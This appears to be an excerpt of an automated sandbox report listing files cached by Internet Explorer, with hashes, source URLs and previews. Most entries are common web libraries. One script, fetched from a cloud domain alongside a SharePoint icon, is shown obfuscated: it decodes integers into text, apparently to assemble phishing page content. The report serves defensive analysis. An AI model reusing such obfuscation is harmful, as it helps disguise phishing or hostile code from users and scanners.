Preview:	.wp-block-audio figcaption{margin-top:.5em;margin-bottom:1em}.wp-block-audio audio{width:100%;min-width:300px}.wp-block-button{color:#fff}.wp-block-button.aligncenter{text-align:center}.wp-block-button.alignright{text-align:right}.wp-block-button__link{background-color:#32373c;border:none;border-radius:28px;box-shadow:none;color:inherit;cursor:pointer;display:inline-block;font-size:18px;margin:0;padding:12px 24px;text-align:center;text-decoration:none;overflow-wrap:break-word}.wp-block-button__link:active,.wp-block-button__link:focus,.wp-block-button__link:hover,.wp-block-button__link:visited{color:inherit}.wp-gs .wp-block-button__link:not(.has-background){background-color:var(--wp-block-core-button--color--background,var(--wp-color--primary,#32373c))}.is-style-squared .wp-block-button__link{border-radius:0}.no-border-radius.wp-block-button__link{border-radius:0!important}.is-style-outline{color:#32373c}.is-style-outline .wp-block-button__link{background-color:transparent;border:2px so

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\wp-embed.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	1434
Entropy (8bit):	5.163070230765156
Encrypted:	false
SSDEEP:	24:Q77/3OiIoZisEenEyst1mbqLiEFjGTLrOpEi6Ruy5iWWYSCkmgP+:Q7jn0sxEysbmmWrGEia5iWWL4gP+
MD5:	8ED6038A5DBF62380DE72A681340AFD3
SHA1:	1B7F829B844EAA1A3E2D05F51FA81D6579D76738
SHA-256:	6EBCDA7A3A41EF97F0B4071160CEB1020E540FDC0F790079A5C2EF01AB654FE0
SHA-512:	CF69087B8F92F7B81EFA788C3EB0B8A551405CDC7FA137E09A918349617359715AD5EF833F901E8D6E80C9FF20F63091710B492224E2AD23848673995DFF5610
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-includes/js/wp-embed.min.js?ver=5.4.4
Preview:	/! This file is auto-generated /.!function(d,l){"use strict";var e=!1,o=!1;if(l.querySelector)if(d.addEventListener)e=!0;if(d.wp=d.wp\|\|{},!d.wp.receiveEmbedMessage)if(d.wp.receiveEmbedMessage=function(e){var t=e.data;if(t)if(t.secret\|\|t.message\|\|t.value)if(!/[^a-zA-Z0-9]/.test(t.secret)){var r,a,i,s,n,o=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),c=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]');for(r=0;r<c.length;r++)c[r].style.display="none";for(r=0;r<o.length;r++)if(a=o[r],e.source===a.contentWindow){if(a.removeAttribute("style"),"height"===t.message){if(1e3<(i=parseInt(t.value,10)))i=1e3;else if(~~i<200)i=200;a.height=i}if("link"===t.message)if(s=l.createElement("a"),n=l.createElement("a"),s.href=a.getAttribute("src"),n.href=t.value,n.host===s.host)if(l.activeElement===a)d.top.location.href=t.value}}},e)d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",t,!1),d.addEventListener("load",t,!1);function t(){if(!o)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Microsoft-SharePoint-2013-icon[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	9159
Entropy (8bit):	7.897176768396139
Encrypted:	false
SSDEEP:	192:YI47oQMFSs7bnQXc5Muu1Sl7LfjXlCgDGUkrudc7W:YI4JVs/Q+Muu0jXlCXUpc7W
MD5:	62FDD2EC231195402D89A8FBC8224165
SHA1:	47DF0C4DAEA8D8C19FB5A79C2AF905A9ECE615C8
SHA-256:	83AA2E8C0654186C80BEC720C2096B3F62B27717F9200208AE78B4932D58747E
SHA-512:	27EAADF51610B6B6F64178A0DBA85694B9420F1AB8BC4CE4D5AF8C9521F9B86FA4F8843AB32AC882D7DEA3D6FA6AA55BED1FDBB8D9068E94F9D8410BF8C168AC
Malicious:	false
Reputation:	low
IE Cache URL:	http://icons.iconarchive.com/icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png
Preview:	.PNG........IHDR.............\r.f..#.IDATx...\|......I...-g.%g.Z.^.J6.Plm..VI....W[m}.....l..z..%..JE..X..xp.Kn......=4b.<..;3......n6yf.y2.w.g..<..a......a...0....0....0....0....0....0....0....0....0....0....0....0....0....0....0....0......"o;z........_}.\|.c...a...c....\|."owz..M.A.i.....'-........%..$..1;.L....J.7.vo:...O#.H..GBT~..I.....0..`oX.N...]............z....X....P.bo.:.g.....&....Og{.2d.,.e`..b..^{Qe.H.F.t.3{.....G\...P..........h.kT.u..6.E..}....P....(.v..L:.S..D.^Tvq...-...^...2.....3..p.T.\|..~....a.(.u.2.(Z&....pC.4...C......I..P...../.>....T..U.`.]\|.}.t..g.,.e`..B.n...P.>T..]....S...2..ZB.d.^..t.".&....E..kl+.!,.e`..O.6T.\.P3>....`...-...%`.(...P....._.aT.G...#t.....Y...28C.E"jN....Se..Vt.b..h..7jNEX......i.[}h..\|T..........S...2.[.E"jN...&.>..-7..F......>.(.RS].......&\|d.........z....q...]4.E<........c..P.s...k...!.....b...Qs..P.........../..D.=..`$`.(...(...^..z(4V4.E.......f.........+....&......*.....k...,.e.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\analytics[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	47051
Entropy (8bit):	5.516264124030958
Encrypted:	false
SSDEEP:	768:ryOveCSBZfsnt5XqY/yPndFTkoWY3SoavqVy2rlebYUDTJC6g0stZm:ryJNDfs5hYdFTwY3SorSg0su
MD5:	53EE95B384D866E8692BB1AEF923B763
SHA1:	A82812B87B667D32A8E51514C578A5175EDD94B4
SHA-256:	E441C3E2771625BA05630AB464275136A82C99650EE2145CA5AA9853BEDEB01B
SHA-512:	C1F98A09A102BB1E87BFDF825A725B0E2CC1DBEDB613D1BD9E8FD9D8FD8B145104D5F4CACA44D96DB14AC20F2F51B4C653278BFC87556E7F00E48A5FA6231FAD
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.google-analytics.com/analytics.js
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var l=this\|\|self,m=function(a,b){a=a.split(".");var c=l;a[0]in c\|\|"undefined"==typeof c.execScript\|\|c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length\|\|void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};var q=function(a,b){for(var c in b)b.hasOwnProperty(c)&&(a[c]=b[c])},r=function(a){for(var b in a)if(a.hasOwnProperty(b))return!0;return!1};var t=/^(?:(?:https?\|mailto\|ftp):\|[^:/?#]*(?:[/?#]\|$))/i;var u=window,v=document,w=function(a,b){v.addEventListener?v.addEventListener(a,b,!1):v.attachEvent&&v.attachEvent("on"+a,b)};var x={},y=function(){x.TAGGING=x.TAGGING\|\|[];x.TAGGING[1]=!0};var z=/:[0-9]+$/,A=function(a,b,c){a=a.split("&");for(var d=0;d<a.length;d++){var e=a[d].split("=");if(decodeURIComponent(e[0]).replace(/\+/g," ")===b)return b=e.slice(1).join("="),c?b:decodeURIComponent(b).replace(/\+/g," ")}},D=function(a,b){b&&(b=String(b).toLowerCase());if("p

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\anchor[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	13468
Entropy (8bit):	5.960980183683687
Encrypted:	false
SSDEEP:	384:3/Sd291OImju7gr1B/UJzniOB/F/WDbDhl0V:3/Sd2910u7grEhByby
MD5:	8EAAADD00AF0B04AA62FE2EA22995700
SHA1:	D4BBB772C1E7E8F4D7BE883CA3E846558B9820F9
SHA-256:	5B43BF629107E8C0C82E1513B3D526F421352F7A144749AF1BE0B2542579AFBE
SHA-512:	5ED81F4F2D3441E856BA820FA975A360B92090DF1612A9F854F767FEA5C7A32BEC70B3612B47CDE02261AAA1BF09EE941883459C15FD10247BFE7963862C1FFC
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.<meta http-equiv="X-UA-Compatible" content="IE=edge">.<style type="text/css">.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxP.ttf) format('truetype');.}.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 500;. src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc9.ttf) format('truetype');.}.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 900;. src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc9.ttf) format('truetype');.}..</style>.<link rel="stylesheet" type="text/css" href="https://www.gstatic.com/recaptcha/releases/UFwvoDBMjc8LiYc1DKXiAomK/styles__ltr.css" nonce="0kQia/8AvqsihcublAU19g">.<script nonce="0kQia/8AvqsihcublAU19g" type="text/javascript">window['__recaptcha_api'] = 'https://www.google.c

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\bootstrap.min[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	121200
Entropy (8bit):	5.0982146191887106
Encrypted:	false
SSDEEP:	768:Vy3Gxw/Vc/QWlJxtQOIuiHlq5mzI4X8OAduFKbv2ctg2Bd8JP7ecQVvH1FS:nw/a1fIuiHlq5mN8lDbNmPbh
MD5:	EC3BB52A00E176A7181D454DFFAEA219
SHA1:	6527D8BF3E1E9368BAB8C7B60F56BC01FA3AFD68
SHA-256:	F75E846CC83BD11432F4B1E21A45F31BC85283D11D372F7B19ACCD1BF6A2635C
SHA-512:	E8C5DAF01EAE68ED7C1E277A6E544C7AD108A0FA877FB531D6D9F2210769B7DA88E4E002C7B0BE3B72154EBF7CBF01A795C8342CE2DAD368BD6351E956195F8B
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/bootstrap-3.3.7/dist/css/bootstrap.min.css
Preview:	/!. Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). //! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\fbevents[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	91541
Entropy (8bit):	5.392815074748715
Encrypted:	false
SSDEEP:	1536:uM+OWt6w6aiSTxeosWXPwShThe7qv0a9sIOU1jaMu5Qm2B+SNSMngUSZYSlIUiGu:uOF+j5SVBYDGE
MD5:	9E0662842A501206D741C8B57826BCFA
SHA1:	3B6E7981C1DF69CD22FB0B43A765196BCDF465DF
SHA-256:	0E49C2B4E86D3FDA1DDA93EB1210A47712F7B091181B4E7C6DA2B3E6F8E86396
SHA-512:	B341E60A1D0ED8B654BACD3A99AF62EA535EB875EA12086E7F5F198E42D38D278B628E24BF87CC6283C10EBE7F2EDFA7A978A9EA4ED2C98C2B31276DA9A864A0
Malicious:	false
Reputation:	low
IE Cache URL:	https://connect.facebook.net/en_US/fbevents.js
Preview:	/*. Copyright (c) 2017-present, Facebook, Inc. All rights reserved... You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook... As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\jquery-ui.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	228077
Entropy (8bit):	5.152286977514727
Encrypted:	false
SSDEEP:	3072:YRpEx1fKB5u3gK61NOBbiQaf8dH8DDyttsKvae/HXPK:MCNUIgMIfMsKCe/HXPK
MD5:	FD255415839568E52A48DA5DE5AF244C
SHA1:	ABD6F85A04584792D77E4791C441FF49E9E28C0D
SHA-256:	9671F8BE70AD94A5362E60F4656D5D53BA214D32AB70A3F9D1603D7DADF9D1C1
SHA-512:	75E0B154D1D8BABB02B0AAC7BA136C6FB2C3F0115CD3A5EB258064E32A8B7F9254F44A663010C0E3C694300F231B981D0CEE34AC73260D332C65430289A7A860
Malicious:	false
Reputation:	low
IE Cache URL:	https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js?ver=1.10.3
Preview:	/! jQuery UI - v1.10.3 - 2013-05-03. http://jqueryui.com.* Includes: jquery.ui.core.js, jquery.ui.widget.js, jquery.ui.mouse.js, jquery.ui.draggable.js, jquery.ui.droppable.js, jquery.ui.resizable.js, jquery.ui.selectable.js, jquery.ui.sortable.js, jquery.ui.effect.js, jquery.ui.accordion.js, jquery.ui.autocomplete.js, jquery.ui.button.js, jquery.ui.datepicker.js, jquery.ui.dialog.js, jquery.ui.effect-blind.js, jquery.ui.effect-bounce.js, jquery.ui.effect-clip.js, jquery.ui.effect-drop.js, jquery.ui.effect-explode.js, jquery.ui.effect-fade.js, jquery.ui.effect-fold.js, jquery.ui.effect-highlight.js, jquery.ui.effect-pulsate.js, jquery.ui.effect-scale.js, jquery.ui.effect-shake.js, jquery.ui.effect-slide.js, jquery.ui.effect-transfer.js, jquery.ui.menu.js, jquery.ui.position.js, jquery.ui.progressbar.js, jquery.ui.slider.js, jquery.ui.spinner.js, jquery.ui.tabs.js, jquery.ui.tooltip.js.* Copyright 2013 jQuery Foundation and other contributors; Licensed MIT */.(function(t,e){function i

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\jquery-ui[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	32046
Entropy (8bit):	5.078852773745703
Encrypted:	false
SSDEEP:	192:Q1StQYpyLPMN1r0sNJdBJU39Mfe3zYZQY+w+ea5Y6B2SmNUm2T8Bw558OV4v9i6V:GYpyLPhOozk1nek+Tx5HVfzS25Sfp
MD5:	D172B560B073F3BC42FEA160BBFF96A2
SHA1:	680D2ABBECD20E970F207E9FDF85E996D5E72580
SHA-256:	9C286C1A80773A8C752FFC323AEC348776F86AB242A4E58636B87F376E0853B1
SHA-512:	9538E5ADEE6EF0262415E92424C09610B69B4F02CD2FF4EBA5470945EE8648EA6D411386751F0F1A7AB2C851D7926A8638EC96DEAE39D27C1B87036B13CB042B
Malicious:	false
Reputation:	low
IE Cache URL:	https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/themes/smoothness/jquery-ui.css
Preview:	/! jQuery UI - v1.10.3 - 2013-05-03. http://jqueryui.com.* Includes: jquery.ui.core.css, jquery.ui.accordion.css, jquery.ui.autocomplete.css, jquery.ui.button.css, jquery.ui.datepicker.css, jquery.ui.dialog.css, jquery.ui.menu.css, jquery.ui.progressbar.css, jquery.ui.resizable.css, jquery.ui.selectable.css, jquery.ui.slider.css, jquery.ui.spinner.css, jquery.ui.tabs.css, jquery.ui.tooltip.css.* To view and modify this theme, visit http://jqueryui.com/themeroller/?ffDefault=Verdana%2CArial%2Csans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=highlight_soft&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=flat&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=glass&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHove

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\linkid[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	1569
Entropy (8bit):	5.369127779967127
Encrypted:	false
SSDEEP:	48:Xpm6RFvCzWzAiWqSeTqn1PByqka1cUj54/vD978:5pfpy1Pkqka1cS52b978
MD5:	0CC3A63FE10060AF4A349E5DF666EEFE
SHA1:	3E8D3925B550345123F2CAB26568221FD4154F9C
SHA-256:	92FCA55833F48B4289AC8F1CEDD48752B580FCE4EC4B5D81670B8193D6E51B54
SHA-512:	5801C9DB98C4998480772CA5AD71F0E400C4756AE713AAB0358CA6593B3A3426499D6DEC81A768C861CBBCD8394DD8C6D647628A13F124FF3A1119F9B7793E8C
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.google-analytics.com/plugins/ua/linkid.js
Preview:	(function(){var e=window,h=document,k="replace";var m=function(a,c,d,b,g){c=encodeURIComponent(c)[k](/$/g,"%28")[k](/$/g,"%29");a=a+"="+c+"; path="+(d\|\|"/")+"; ";g&&(a+="expires="+(new Date((new Date).getTime()+g)).toGMTString()+"; ");b&&"none"!=b&&(a+="domain="+b+";");b=h.cookie;h.cookie=a;return b!=h.cookie},p=function(a){var c=h.body;try{c.addEventListener?c.addEventListener("click",a,!1):c.attachEvent&&c.attachEvent("onclick",a)}catch(d){}};var q=function(a,c,d,b){this.get=function(){for(var b=void 0,c=[],d=h.cookie.split(";"),l=new RegExp("^\\s"+a+"=\\s(.?)\\s$"),f=0;f<d.length;f++){var n=d[f].match(l);n&&c.push(decodeURIComponent(n[1][k](/%28/g,"(")[k](/%29/g,")")))}for(d=0;d<c.length;d++)c[d]&&(b=c[d]);return b};this.set=function(g){return m(a,g,b,c,1E3*d)};this.remove=function(){return m(a,"",b,c,-100)}};var t=function(a,c){var d=void 0;if("function"==typeof a.get&&"function"==typeof a.set){var b=c\|\|{},g=b.hasOwnProperty("cookieName")?b.cookieName:"_gali",r=b.hasOwnProper

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\myscr294914[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1358
Entropy (8bit):	5.1992080819622855
Encrypted:	false
SSDEEP:	24:YS5EieF+mexDrlY+BloKxKuMo7a7vz27B79z7gz275r7Q7Nz27d7z72zqC:i+meBrlY+Blyvo7a7727B797c275r7Qb
MD5:	D88D51D6C68DC6EF0BAC9737DD14CF68
SHA1:	BC5F511F8FCF2B36646FE8D953547D1266514F36
SHA-256:	3BE1AAA49873C8A579CBB323ED55F1576DB39393EC4E97B186AF64F1324AFB43
SHA-512:	ACAD81FDB1161BA77AFC3E2161359125922079770E841083B18788E665A3D5291B6F86BF2B152C1C96DED92461C562CA45E7881EACEFF6D8E308C10A5CEE2900
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/myscr294914.js
Preview:	var erp = new Array;.erp[0] = 540831806;.erp[1] = 1013346158;.erp[2] = 1948283753;.erp[3] = 2053455138;.erp[4] = 841097318;.erp[5] = 1633903933;.erp[6] = 575959653;.erp[7] = 1651860328;.erp[8] = 1702109261;.erp[9] = 1394745443;.erp[10] = 1869377394;.erp[11] = 1025663596;.erp[12] = 1633905442;.erp[13] = 1042301807;.erp[14] = 1852205426;.erp[15] = 1830832484;.erp[16] = 1701737577;.erp[17] = 1954095220;.erp[18] = 1864388722;.erp[19] = 1870030112;.erp[20] = 1500476704;.erp[21] = 1634886944;.erp[22] = 1852797984;.erp[23] = 1629508207;.erp[24] = 1651471420;.erp[25] = 795242350;.erp[26] = 1950235746;.erp[27] = 1916669194;.erp[28] = 0;.var em = '';.for(i=0;i<erp.length;i++){..tmp = erp[i];..if(Math.floor((tmp/Math.pow(256,3)))>0){...em += String.fromCharCode(Math.floor((tmp/Math.pow(256,3))));..};..tmp = tmp - (Math.floor((tmp/Math.pow(256,3))) * Math.pow(256,3));..if(Math.floor((tmp/Math.pow(256,2)))>0){...em += String.fromCharCode(Math.floor((tmp/Math.pow(256,2))));..};..tmp = tmp - (Math.fl

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\popper.js[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	19188
Entropy (8bit):	5.212814407014048
Encrypted:	false
SSDEEP:	384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
MD5:	70D3FDA195602FE8B75E0097EED74DDE
SHA1:	C3B977AA4B8DFB69D651E07015031D385DED964B
SHA-256:	A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
SHA-512:	51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/index_files/popper.js.download
Preview:	/. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. /(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode\|\|e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto\|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\scripts[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	14105
Entropy (8bit):	5.0498089462288
Encrypted:	false
SSDEEP:	384:Y0M5w2j16xNN7FU2CyuIC+VhB2jv2lyZV21IU4pYS3OVKEklBnC:R8Xj16xNN7C2ToxU4pYZVCC
MD5:	309E1A27AB5C8722DEA8F46FC8C384D5
SHA1:	784A35686079A37CF469E27FD7EFA1B2FAC7AC97
SHA-256:	A0EA735F765D5BC1230BEB63BCB701B69C80D77C48572A61BB159A8915903278
SHA-512:	E8E2477B1547D75A663738721465E406EC35CEAB8BB611F1D545BF54276DDC779D40F10C120D8E611B17C6A94D6C70371C6AE773E0D5BD19E78154AC8BA114E5
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.2.1
Preview:	( function( $ ) {...'use strict';...if ( typeof wpcf7 === 'undefined' \|\| wpcf7 === null ) {...return;..}...wpcf7 = $.extend( {...cached: 0,...inputs: []..}, wpcf7 );...$( function() {...wpcf7.supportHtml5 = ( function() {....var features = {};....var input = document.createElement( 'input' );.....features.placeholder = 'placeholder' in input;.....var inputTypes = [ 'email', 'url', 'tel', 'number', 'range', 'date' ];.....$.each( inputTypes, function( index, value ) {.....input.setAttribute( 'type', value );.....features[ value ] = input.type !== 'text';....} );.....return features;...} )();....$( 'div.wpcf7 > form' ).each( function() {....var $form = $( this );....wpcf7.initForm( $form );.....if ( wpcf7.cached ) {.....wpcf7.refill( $form );....}...} );..} );...wpcf7.getId = function( form ) {...return parseInt( $( 'input[name="_wpcf7"]', form ).val(), 10 );..};...wpcf7.initForm = function( form ) {...var $form = $( form );....wpcf7.setStatus( $form, 'init' );....$form.submit( function(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\styles__ltr[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	51104
Entropy (8bit):	5.9690514510415
Encrypted:	false
SSDEEP:	768:+LUmmAWTe2uXYp8Mi+yKSrKebyBwoDl+xedtY5PoiDH1fkQJVEwY:4UcW6v+2rKwoDliP7dnY
MD5:	B8C5BF5AECA93C917B1E1D30F9E154F9
SHA1:	29158B46C84DAEA48427BED5DF71712B813EC7D1
SHA-256:	ED64927E84FD6A93A31D808E018467B1DEBC6F46822A7ACBC20D6F16A1B620B9
SHA-512:	27F9DED63916655131A8BD5A42E156270C1B238215DEF46574D1A23EBCC05CB593ECA05942014F80C011EA1A5CE30B343161485A5705B0D181867E680B683C08
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.gstatic.com/recaptcha/releases/UFwvoDBMjc8LiYc1DKXiAomK/styles__ltr.css
Preview:	.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAABIAAAASABGyWs+AAAACXZwQWcAAABUAAADSAC4K4y8AAA4oElEQVR42u2dCZRV1ZX3q5iE4IQIiKQQCKBt0JLEIUZwCCk7pBNFiRMajZrIl9aOLZ8sY4CWdkDbT2McooaAEmNixFhpaYE2dCiLScWiQHCgoGQoGQuhGArKKl7V+c5/n33fO/V4w733nVuheXuv9V/rrnvP2Xud3zvTPee+ewsKxMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExP4OdtlT6ztAbRWvvLy8A3QkwxzH6tBGMMexI

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\webworker[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	102
Entropy (8bit):	4.812993881578463
Encrypted:	false
SSDEEP:	3:JSbMqSL1cdXWKQKwMXFf3EWaee:PLKdXNQKwkEL
MD5:	F478DAB0AB23A2C05C140A57CD2AFDCD
SHA1:	E7903342A9766841FC8C80D99D3FA0AF61A0436F
SHA-256:	E5FD8BC34FD6C3A210FFDE57800445F90A248CC39189D018D990DE477CA30A10
SHA-512:	F22C5B2BFAC59A43FF76625743015613529F74A3ED3F549FE8B36CA9DC406DCF639872A47900796FC103280B77592058D34FF22DFD01486293E6C7E6B872C8AF
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=UFwvoDBMjc8LiYc1DKXiAomK
Preview:	importScripts('https://www.gstatic.com/recaptcha/releases/UFwvoDBMjc8LiYc1DKXiAomK/recaptcha__en.js');

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\KFOlCnqEu92Fr1MmEU9fBBc9[1].ttf Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 8 names, Microsoft, language 0x409, Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me
Category:	downloaded
Size (bytes):	35588
Entropy (8bit):	6.410135551455154
Encrypted:	false
